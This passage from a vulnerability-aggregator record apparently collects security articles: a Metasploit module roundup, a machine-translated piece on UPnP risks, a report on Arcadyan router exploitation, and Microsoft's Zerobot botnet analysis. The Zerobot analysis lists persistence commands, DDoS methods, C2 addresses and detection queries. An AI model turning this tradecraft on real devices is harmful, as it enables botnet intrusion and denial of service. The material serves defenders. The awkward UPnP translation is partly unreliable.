This vulnerability has been fixed in the admin component version 1.10.10, which was released with GravCMS version 1.7.9.\n * [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15090>) by Pedro Ribeiro, which exploits [CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>). This is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.\n * [IGEL OS Secure VNC/Terminal Command Injection RCE](<https://github.com/rapid7/metasploit-framework/pull/14947>) by James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, and Steven Laura - This adds a new module that exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.\n * [Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE](<https://github.com/rapid7/metasploit-framework/pull/15105>) by Bruno Keith (bkth_), Grant Willcox (tekwizz123), Niklas Baumstark (_niklasb), and Rajvardhan Agarwal (r4j0x00), which exploits [CVE-2021-21220](<https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220?referrer=blog>) \\- This adds an exploit module for a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth). 
\nNote that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.\n * [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Active Directory credentials from two different solutions on UNIX (SSSD and VAS).\n * [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Kerberos tickets from two different solutions on UNIX (SSSD and VAS).\n\n## Enhancements and features\n\n * [#14831](<https://github.com/rapid7/metasploit-framework/pull/14831>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Updates the HttpClient mixin with a new cookie jar implementation which correctly updates and merges the `Set-Cookie` header responses when using the `send_request_cgi` `keep_cookies` option\n * [#15000](<https://github.com/rapid7/metasploit-framework/pull/15000>) from [pingport80](<https://github.com/pingport80>) \\- Replaces the use of the `which` command with `command -v` giving us a more portable solution\n * [#15087](<https://github.com/rapid7/metasploit-framework/pull/15087>) from [pedrib](<https://github.com/pedrib>) \\- The `exploit/windows/local/microfocus_operations_privesc` module now supports both vulnerable Operations Bridge Manager installations and vulnerable Operations Bridge Reporter installations, with the new additional target being Operations Bridge Reporter.\n * [#15096](<https://github.com/rapid7/metasploit-framework/pull/15096>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session support to the `post/windows/gather/checkvm` module. 
This also notably adds cross-platform support for getting a list of running processes using shell and Meterpreter sessions.\n * [#15136](<https://github.com/rapid7/metasploit-framework/pull/15136>) from [pedrib](<https://github.com/pedrib>) \\- Update the `exploit/multi/http/microfocus_ucmdb_unauth_deser` module default Linux payload from `cmd/unix/generic` to `cmd/unix/reverse_python`.\n * [#15138](<https://github.com/rapid7/metasploit-framework/pull/15138>) from [h00die](<https://github.com/h00die>) \\- This enhances the `auxiliary/scanner/http/dell_idrac` module by cleaning up the code, adding the `last_attempted_at` field to `create_credential_login` to prevent a crash, and adding documentation for the module.\n\n## Bugs Fixed\n\n * [#15111](<https://github.com/rapid7/metasploit-framework/pull/15111>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.\n * [#15116](<https://github.com/rapid7/metasploit-framework/pull/15116>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a bug that would occur when importing newer Acunetix reports into the database due to a change in how the timestamp is formatted.\n * [#15120](<https://github.com/rapid7/metasploit-framework/pull/15120>) from [pedrib](<https://github.com/pedrib>) \\- Fixes a regression within `tools/modules/module_author.rb ` so that it runs without crashing\n * [#15140](<https://github.com/rapid7/metasploit-framework/pull/15140>) from [wvu-r7](<https://github.com/wvu-r7>) \\- `msftidy_docs.rb` now doesn't double warn on optional (and missing) `Options` headers.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 
6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-29T10%3A54%3A48-05%3A00..2021-05-05T09%3A27%3A49-04%3A00%22>)\n * [Full diff 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/compare/6.0.42...6.0.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-07T19:41:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21425", "CVE-2021-22502"], "modified": "2021-05-07T19:41:01", "id": "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "href": "https://blog.rapid7.com/2021/05/07/metasploit-wrap-up-110/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-28T22:38:03", "description": "Earlier this year, Chromecast streaming dongle, Google Home devices and smart TV users are forced to harvest a strip from the youtube PewDiePie channel promotion information. This hijacking is said by the tube top traffic UP the main are a fan of the battle for the thrown. Reported that hackers exploit the improperly configured router, these routers enable the universal plug and play(Universal Plug \u2013 and \u2013 Play, abbreviated UPnP)service, resulting in the router the public port to the private device and the public Internet open. \nMany devices such as cameras, printers and routers, use the UPnP Protocol, so that it can automatically find and check local other devices on the network, and can communicate with each other to share data or stream media. 
But it brings convenience, but also brings security risks, such as from attacker-controlled devices to bypass the firewall protection, etc., to name a few. \nIn the above event, we investigated a home network with UPnP-related events, found that many users of the device still using the UPnP Protocol. \n\n! [](/Article/UploadPic/2019-3/20193292294895.jpg) \nTable 1. Enabled UPnP for major equipment types \nThis year 1 month, we detected 76 per cent of the router to enable the UPnP Protocol, and 27% of media equipment such as DVD player and media streaming device is also enabled UPnP. Once the UPnP vulnerability be exploited by attackers, a router or other device easily becomes the agent, and then become confused botnets, distributed denial of service attacks([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>))or spam campaigns the source, and let people almost can't track malicious activity implementation. Previously there have been such cases, the use of a router UPnP Protocol vulnerabilities so that it is forced to connect to Port, send spam or other malicious messages. \nIoT botnet Satori was due to the use of the UPnP vulnerabilities and the infamous. The vulnerability, CVE-2014-8361 is a Realtek SDK miniigd UPnP SOAP interface command injection vulnerability. 2015 5 months, and this vulnerability is related to the announcement and provided the appropriate mitigation measures, but according to our collection of the latest data, many devices are still using older, possibly vulnerable UPnP version. \n\n! [](/Article/UploadPic/2019-3/20193292295992. png) \nFigure 1. Shodan for UPnP detection of the relevant results of the 2019 \u5e74 3 \u6708 5 data \nOnline search engine Shodan can be presented worldwide using the UPnP Protocol, the device number and distribution. In the scan UPnP uses the standard port 1900, we retrieved the 1,649,719. 
The following table lists some of the well-known UPnP libraries, MiniUPnPd and Custom\uff08Broadcom UPnP library is the most search equipment used. \n! [](/Article/UploadPic/2019-3/20193292297936.jpg) \nTable 2. Shodan display the results in the first three UPnP library 2019 3 month 5 day data \nUPnP related vulnerabilities and the home network device status \nThrough our own Scan tool, we studied the family and other small-scale network environment using UPnP library, and to determine the possible cause the device to the vulnerable factors. In short, we found that most devices still use the older version of the UPnP library, and these UPnP library in the presence of many vulnerabilities have been published for many years. \nMiniUPnPd \nOur IOT scan tool data display, enable UPnP devices 16% use a MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon for NAT\uff08Network Address Translation a router providing port mapping Protocol services. Interestingly, we detected installed older versions of MiniUPnPd device, with 24%in the use MiniUPnPd 1.0, 30% in the use MiniUPnPd 1.6, only 5%of the equipment used MiniUPnPd 2. x version(miniupnpd 2.1 is the latest version). \n! [](/Article/UploadPic/2019-3/20193292298107.jpg) \nTable 3. MiniUPnPd each version using the ratio of \nHaving the older version of Daemon equipment must be updated, in order to put an end to some of the known high-risk vulnerabilities. For example, CVE-2013-0230 is the MiniUPnPd version 1.0 of the ExecuteSoapAction in a stack-based buffer overflow vulnerability that allows an attacker to execute arbitrary code; CVE-2013-0229 is MiniUPnPd 1.4 before a ProcessSSDPRequest a function of the vulnerability, which allows an attacker through a request to trigger a buffer over-read to cause a denial of Service(DoS); the CVE-2017-1000494 is MiniUPnPd version 2.0 prior to an uninitialized stack variable vulnerability, which allows attackers to initiate a DoS attack(segmentation fault and memory damage). 
\nWindows UPnP server \nWe also found that 18% of devices use a Windows-based UPnP implementation. These devices, especially Microsoft Windows XP (Windows NT 5.1) computers, should be checked to see whether the MS07-019 patch has been applied. (Windows XP reached end of life in April 2014, which means it is no longer supported by Microsoft and its security issues will not be fixed.) Windows XP ships with UPnP functionality available out of the box, and the patch fixes the UPnP memory corruption vulnerability CVE-2007-1204, which allows a remote attacker to run arbitrary code in the context of the local service account. \nLibupnp, the portable SDK for UPnP devices \nThe Portable SDK for UPnP Devices, libupnp, is another well-known UPnP library, and it supports a variety of [operating systems](<http://www.myhack58.com/Article/48/Article_048_1.htm>). According to our data, 5% of the detected devices use the libupnp library package. Although this is not a large proportion, we note that devices with this library mostly run versions before 1.6.18/1.6.19, while the current version is 1.8.4. In versions before 1.6.18, the unique_service_name function has a stack-based buffer overflow vulnerability, CVE-2012-5958, which allows remote attackers to execute arbitrary code via a User Datagram Protocol (UDP) packet. \nConclusions \nFor users, determining whether a device has UPnP-related vulnerabilities or whether it is infected is very tricky. Some devices may be hidden behind a NAT, so that even if a vulnerability exists, the user will not immediately see the risk. To prevent the exploitation of UPnP-related vulnerabilities, users should make sure their devices are updated. If you suspect a device is infected, you should restart it, reset it to factory settings, or, to be prudent, replace it altogether. 
Unless the network needs the device's UPnP function, it is best to disable it where the device allows. Note, however, that turning off UPnP may also disable some related features, including features that local devices depend on, or requests coming from devices that would then be ignored. \nHome users can also follow these measures to increase security: \n1. Use the Trend Micro HouseCall for Home Networks tool to scan the home network and check which devices have UPnP port 1900 open. \n2. Go to the device's setup page, for example the router's settings page, to disable UPnP. \n3. Manually configure port forwarding settings as needed. \n\n", "edition": 2, "cvss3": {}, "published": "2019-03-29T00:00:00", "title": "Next from the printer coming out will be?-- The theory of the UPnP using the status quo and risk-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0229", "CVE-2013-0230", "CVE-2007-1204", "CVE-2017-1000494", "CVE-2012-5958", "CVE-2014-8361"], "modified": "2019-03-29T00:00:00", "id": "MYHACK58:62201993392", "href": "http://www.myhack58.com/Article/html/3/62/2019/93392.htm", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat 
actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto 
Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021-20090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. 
Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continues to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. 
We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. 
Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh_ that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe_). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. 
See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop_.\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. 
\nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. 
The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least-privilege access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged solutions, enable Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on your or your organization\u2019s devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender 
for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), 
